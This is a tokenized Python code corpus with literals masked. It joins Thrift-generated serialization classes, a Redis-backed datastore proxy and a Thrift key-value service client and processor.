thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . isDelete != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . BOOL , <NUM_LIT:1> ) <EOL> oprot . writeBool ( self . isDelete ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . column != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . STRING , <NUM_LIT:2> ) <EOL> oprot . writeString ( self . column ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . value != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:value>' , TType . STRING , <NUM_LIT:3> ) <EOL> oprot . writeString ( self . value ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class BatchMutation : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT>' , None , None , ) , <EOL> ( <NUM_LIT:2> , TType . LIST , '<STR_LIT>' , ( TType . STRUCT , ( Mutation , Mutation . thrift_spec ) ) , None , ) , <EOL> ) <EOL> def __init__ ( self , row = None , mutations = None , ) : <EOL> self . row = row <EOL> self . mutations = mutations <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . 
readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . row = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:2> : <EOL> if ftype == TType . LIST : <EOL> self . mutations = [ ] <EOL> ( _etype3 , _size0 ) = iprot . readListBegin ( ) <EOL> for _i4 in xrange ( _size0 ) : <EOL> _elem5 = Mutation ( ) <EOL> _elem5 . read ( iprot ) <EOL> self . mutations . append ( _elem5 ) <EOL> iprot . readListEnd ( ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . row != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . row ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . mutations != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . LIST , <NUM_LIT:2> ) <EOL> oprot . writeListBegin ( TType . STRUCT , len ( self . mutations ) ) <EOL> for iter6 in self . mutations : <EOL> iter6 . write ( oprot ) <EOL> oprot . writeListEnd ( ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . 
__dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class TRowResult : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT>' , None , None , ) , <EOL> ( <NUM_LIT:2> , TType . MAP , '<STR_LIT>' , ( TType . STRING , None , TType . STRUCT , ( TCell , TCell . thrift_spec ) ) , None , ) , <EOL> ) <EOL> def __init__ ( self , row = None , columns = None , ) : <EOL> self . row = row <EOL> self . columns = columns <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . row = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:2> : <EOL> if ftype == TType . MAP : <EOL> self . columns = { } <EOL> ( _ktype8 , _vtype9 , _size7 ) = iprot . readMapBegin ( ) <EOL> for _i11 in xrange ( _size7 ) : <EOL> _key12 = iprot . readString ( ) ; <EOL> _val13 = TCell ( ) <EOL> _val13 . read ( iprot ) <EOL> self . columns [ _key12 ] = _val13 <EOL> iprot . readMapEnd ( ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . 
writeStructBegin ( '<STR_LIT>' ) <EOL> if self . row != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . row ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . columns != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . MAP , <NUM_LIT:2> ) <EOL> oprot . writeMapBegin ( TType . STRING , TType . STRUCT , len ( self . columns ) ) <EOL> for kiter14 , viter15 in self . columns . items ( ) : <EOL> oprot . writeString ( kiter14 ) <EOL> viter15 . write ( oprot ) <EOL> oprot . writeMapEnd ( ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class IOError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT:message>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , message = None , ) : <EOL> self . message = message <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . message = iprot . 
readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . message != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:message>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . message ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __str__ ( self ) : <EOL> return repr ( self ) <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class IllegalArgument ( Exception ) : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT:message>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , message = None , ) : <EOL> self . message = message <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . 
readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . message = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . message != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:message>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . message ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __str__ ( self ) : <EOL> return repr ( self ) <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class AlreadyExists ( Exception ) : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT:message>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , message = None , ) : <EOL> self . message = message <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . 
__class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . message = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . message != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:message>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . message ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __str__ ( self ) : <EOL> return repr ( self ) <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) </s>
<s> import sys <EOL> import base64 <EOL> import redis <EOL> from dbinterface import * <EOL> import sqlalchemy . pool as pool <EOL> import appscale_logger <EOL> ERROR_DEFAULT = "<STR_LIT>" <EOL> DEBUG = False <EOL> FILENAME = "<STR_LIT>" <EOL> FILE = open ( FILENAME , "<STR_LIT:w>" , <NUM_LIT:0> ) <EOL> class DatastoreProxy ( AppDBInterface ) : <EOL> def __init__ ( self , logger = appscale_logger . getLogger ( "<STR_LIT>" ) ) : <EOL> self . logger = logger <EOL> self . masterConn = self . __createMasterConnection ( ) <EOL> self . slaveConn = self . __createLocalConnection ( ) <EOL> def create_table ( self , table_name , columns ) : <EOL> elist = [ ERROR_DEFAULT ] <EOL> if DEBUG : FILE . write ( "<STR_LIT>" ) <EOL> if ( not table_name ) or ( not columns ) : <EOL> elist [ <NUM_LIT:0> ] += "<STR_LIT>" <EOL> return elist <EOL> cols = '<STR_LIT::>' . join ( columns ) <EOL> key = '<STR_LIT>' + table_name <EOL> conn = self . masterConn <EOL> if ( not conn ) : <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % conn ) <EOL> if ( not conn . exists ( key ) ) : <EOL> conn . set ( key , cols ) <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % ( cols , key ) ) <EOL> return <NUM_LIT:1> <EOL> else : <EOL> elist [ <NUM_LIT:0> ] += "<STR_LIT>" <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % ( str ( elist ) ) ) <EOL> return elist <EOL> def get_entity ( self , table_name , row_key , column_names ) : <EOL> elist = [ ERROR_DEFAULT ] <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % table_name ) <EOL> if ( not row_key ) or ( not table_name ) : <EOL> elist [ <NUM_LIT:0> ] += "<STR_LIT>" <EOL> if DEBUG : FILE . write ( "<STR_LIT>" ) <EOL> return elist <EOL> conn = self . slaveConn <EOL> row_key = table_name + '<STR_LIT:/>' + row_key <EOL> data = [ ] <EOL> if ( not conn . exists ( row_key ) ) : <EOL> elist [ <NUM_LIT:0> ] += "<STR_LIT>" % ( table_name , row_key , str ( column_names ) , str ( elist ) ) <EOL> if DEBUG : FILE . 
write ( "<STR_LIT>" % ( table_name , row_key , str ( column_names ) , str ( elist ) ) ) <EOL> return elist <EOL> data = conn . hmget ( row_key , column_names ) <EOL> for d in data : <EOL> elist . append ( str ( d ) ) <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % ( str ( elist ) ) ) <EOL> return elist <EOL> def get_schema ( self , table_name ) : <EOL> elist = [ ERROR_DEFAULT ] <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % table_name ) <EOL> if ( not table_name ) : <EOL> elist [ <NUM_LIT:0> ] += "<STR_LIT>" <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % ( str ( elist ) ) ) <EOL> return elist <EOL> conn = self . slaveConn <EOL> key = '<STR_LIT>' + table_name <EOL> if ( not conn . exists ( key ) ) : <EOL> elist [ <NUM_LIT:0> ] += "<STR_LIT>" <EOL> else : <EOL> cols = conn . get ( key ) <EOL> schema = cols . split ( '<STR_LIT::>' ) <EOL> for i in schema : <EOL> elist . append ( str ( i ) ) <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % ( key , str ( elist ) ) ) <EOL> return elist <EOL> def put_entity ( self , table_name , row_key , column_names , cell_values ) : <EOL> elist = [ ERROR_DEFAULT ] <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % table_name ) <EOL> if ( not row_key ) or ( not table_name ) : <EOL> elist [ <NUM_LIT:0> ] += "<STR_LIT>" <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % ( str ( elist ) ) ) <EOL> return elist <EOL> if len ( column_names ) != len ( cell_values ) : <EOL> elist [ <NUM_LIT:0> ] += "<STR_LIT>" <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % ( str ( column_names ) , str ( cell_values ) , str ( elist ) ) ) <EOL> return elist <EOL> conn = self . masterConn <EOL> fields = { } <EOL> key = '<STR_LIT>' + table_name <EOL> old_data = [ ] <EOL> if ( not conn . exists ( key ) ) : <EOL> self . create_table ( table_name , column_names ) <EOL> columns = column_names <EOL> else : <EOL> columns = self . get_schema ( table_name ) [ <NUM_LIT:1> : ] <EOL> old_data = self . 
get_entity ( table_name , row_key , columns ) <EOL> for i in range ( <NUM_LIT:0> , len ( column_names ) ) : <EOL> fields [ column_names [ i ] ] = cell_values [ i ] <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % ( str ( fields ) ) ) <EOL> row_key = table_name + '<STR_LIT:/>' + row_key <EOL> if ( conn . hmset ( row_key , fields ) ) : <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % row_key ) ; <EOL> elist . append ( "<STR_LIT:0>" ) <EOL> return elist <EOL> def delete_table ( self , table_name ) : <EOL> elist = [ ERROR_DEFAULT ] <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % table_name ) <EOL> if not table_name : <EOL> elist [ <NUM_LIT:0> ] += "<STR_LIT>" <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % ( str ( elist ) ) ) <EOL> return elist <EOL> conn = self . masterConn <EOL> if ( not conn . exists ( '<STR_LIT>' + table_name ) ) : <EOL> elist [ <NUM_LIT:0> ] += "<STR_LIT>" % table_name <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % table_name ) <EOL> return elist <EOL> pattern = table_name + '<STR_LIT:/>' <EOL> rows = conn . keys ( pattern ) <EOL> for r in rows : <EOL> conn . delete ( r ) <EOL> if ( conn . delete ( '<STR_LIT>' + table_name ) ) : <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % table_name ) <EOL> elist . append ( "<STR_LIT:0>" ) <EOL> return elist <EOL> def delete_row ( self , table_name , row_key ) : <EOL> elist = [ ERROR_DEFAULT ] <EOL> if ( not row_key ) or ( not table_name ) : <EOL> elist [ <NUM_LIT:0> ] += "<STR_LIT>" <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % ( row_key , table_name , str ( elist ) ) ) <EOL> return elist <EOL> conn = self . masterConn <EOL> row_key = table_name + '<STR_LIT:/>' + row_key <EOL> if ( conn . delete ( row_key ) ) : <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % row_key ) <EOL> elist . append ( "<STR_LIT:0>" ) <EOL> return elist <EOL> def get_table ( self , table_name , column_names = [ ] ) : <EOL> elist = [ ERROR_DEFAULT ] <EOL> if DEBUG : FILE . 
write ( "<STR_LIT>" % table_name ) <EOL> if ( not table_name ) : <EOL> elist [ <NUM_LIT:0> ] += "<STR_LIT>" <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % ( str ( elist ) ) ) <EOL> return elist <EOL> conn = self . slaveConn <EOL> if ( not conn . exists ( '<STR_LIT>' + table_name ) ) : <EOL> if DEBUG : FILE . write ( "<STR_LIT>" ) <EOL> return elist <EOL> else : <EOL> columns = self . get_schema ( table_name ) [ <NUM_LIT:1> : ] <EOL> data = [ ] <EOL> pattern = table_name + '<STR_LIT>' <EOL> rows = conn . keys ( pattern ) <EOL> for r in rows : <EOL> data . append ( conn . hmget ( r , columns ) ) <EOL> for d in data : <EOL> for i in d : <EOL> elist . append ( str ( i ) ) <EOL> if DEBUG : FILE . write ( "<STR_LIT>" % ( str ( elist ) ) ) <EOL> return elist <EOL> def __createLocalConnection ( self ) : <EOL> return redis . Redis ( host = self . get_local_ip ( ) , port = <NUM_LIT> , db = <NUM_LIT:0> ) <EOL> def __createMasterConnection ( self ) : <EOL> return redis . Redis ( host = self . get_master_ip ( ) , port = <NUM_LIT> , db = <NUM_LIT:0> ) </s>
<s> from thrift . Thrift import * <EOL> from ttypes import * <EOL> from thrift . Thrift import TProcessor <EOL> from thrift . transport import TTransport <EOL> from thrift . protocol import TBinaryProtocol <EOL> try : <EOL> from thrift . protocol import fastbinary <EOL> except : <EOL> fastbinary = None <EOL> class Iface : <EOL> def get ( self , store , key ) : <EOL> pass <EOL> def put ( self , store , key , value ) : <EOL> pass <EOL> def remove ( self , store , key ) : <EOL> pass <EOL> class Client ( Iface ) : <EOL> def __init__ ( self , iprot , oprot = None ) : <EOL> self . _iprot = self . _oprot = iprot <EOL> if oprot != None : <EOL> self . _oprot = oprot <EOL> self . _seqid = <NUM_LIT:0> <EOL> def get ( self , store , key ) : <EOL> self . send_get ( store , key ) <EOL> return self . recv_get ( ) <EOL> def send_get ( self , store , key ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = get_args ( ) <EOL> args . store = store <EOL> args . key = key <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def recv_get ( self , ) : <EOL> ( fname , mtype , rseqid ) = self . _iprot . readMessageBegin ( ) <EOL> if mtype == TMessageType . EXCEPTION : <EOL> x = TApplicationException ( ) <EOL> x . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> raise x <EOL> result = get_result ( ) <EOL> result . read ( self . _iprot ) <EOL> self . _iprot . readMessageEnd ( ) <EOL> if result . success != None : <EOL> return result . success <EOL> raise TApplicationException ( TApplicationException . MISSING_RESULT , "<STR_LIT>" ) ; <EOL> def put ( self , store , key , value ) : <EOL> self . send_put ( store , key , value ) <EOL> def send_put ( self , store , key , value ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = put_args ( ) <EOL> args . store = store <EOL> args . 
key = key <EOL> args . value = value <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> def remove ( self , store , key ) : <EOL> self . send_remove ( store , key ) <EOL> def send_remove ( self , store , key ) : <EOL> self . _oprot . writeMessageBegin ( '<STR_LIT>' , TMessageType . CALL , self . _seqid ) <EOL> args = remove_args ( ) <EOL> args . store = store <EOL> args . key = key <EOL> args . write ( self . _oprot ) <EOL> self . _oprot . writeMessageEnd ( ) <EOL> self . _oprot . trans . flush ( ) <EOL> class Processor ( Iface , TProcessor ) : <EOL> def __init__ ( self , handler ) : <EOL> self . _handler = handler <EOL> self . _processMap = { } <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_get <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_put <EOL> self . _processMap [ "<STR_LIT>" ] = Processor . process_remove <EOL> def process ( self , iprot , oprot ) : <EOL> ( name , type , seqid ) = iprot . readMessageBegin ( ) <EOL> if name not in self . _processMap : <EOL> iprot . skip ( TType . STRUCT ) <EOL> iprot . readMessageEnd ( ) <EOL> x = TApplicationException ( TApplicationException . UNKNOWN_METHOD , '<STR_LIT>' % ( name ) ) <EOL> oprot . writeMessageBegin ( name , TMessageType . EXCEPTION , seqid ) <EOL> x . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . flush ( ) <EOL> return <EOL> else : <EOL> self . _processMap [ name ] ( self , seqid , iprot , oprot ) <EOL> return True <EOL> def process_get ( self , seqid , iprot , oprot ) : <EOL> args = get_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> result = get_result ( ) <EOL> result . success = self . _handler . get ( args . store , args . key ) <EOL> oprot . writeMessageBegin ( "<STR_LIT>" , TMessageType . REPLY , seqid ) <EOL> result . write ( oprot ) <EOL> oprot . writeMessageEnd ( ) <EOL> oprot . trans . 
flush ( ) <EOL> def process_put ( self , seqid , iprot , oprot ) : <EOL> args = put_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> self . _handler . put ( args . store , args . key , args . value ) <EOL> return <EOL> def process_remove ( self , seqid , iprot , oprot ) : <EOL> args = remove_args ( ) <EOL> args . read ( iprot ) <EOL> iprot . readMessageEnd ( ) <EOL> self . _handler . remove ( args . store , args . key ) <EOL> return <EOL> class get_args : <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT:store>' , None , None , ) , <EOL> ( <NUM_LIT:2> , TType . STRING , '<STR_LIT:key>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , d = None ) : <EOL> self . store = None <EOL> self . key = None <EOL> if isinstance ( d , dict ) : <EOL> if '<STR_LIT:store>' in d : <EOL> self . store = d [ '<STR_LIT:store>' ] <EOL> if '<STR_LIT:key>' in d : <EOL> self . key = d [ '<STR_LIT:key>' ] <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . store = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:2> : <EOL> if ftype == TType . STRING : <EOL> self . key = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . 
TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . store != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:store>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . store ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . key != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:key>' , TType . STRING , <NUM_LIT:2> ) <EOL> oprot . writeString ( self . key ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __str__ ( self ) : <EOL> return str ( self . __dict__ ) <EOL> def __repr__ ( self ) : <EOL> return repr ( self . __dict__ ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class get_result : <EOL> thrift_spec = ( <EOL> ( <NUM_LIT:0> , TType . STRUCT , '<STR_LIT:success>' , ( value_t , value_t . thrift_spec ) , None , ) , <EOL> ) <EOL> def __init__ ( self , d = None ) : <EOL> self . success = None <EOL> if isinstance ( d , dict ) : <EOL> if '<STR_LIT:success>' in d : <EOL> self . success = d [ '<STR_LIT:success>' ] <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:0> : <EOL> if ftype == TType . STRUCT : <EOL> self . 
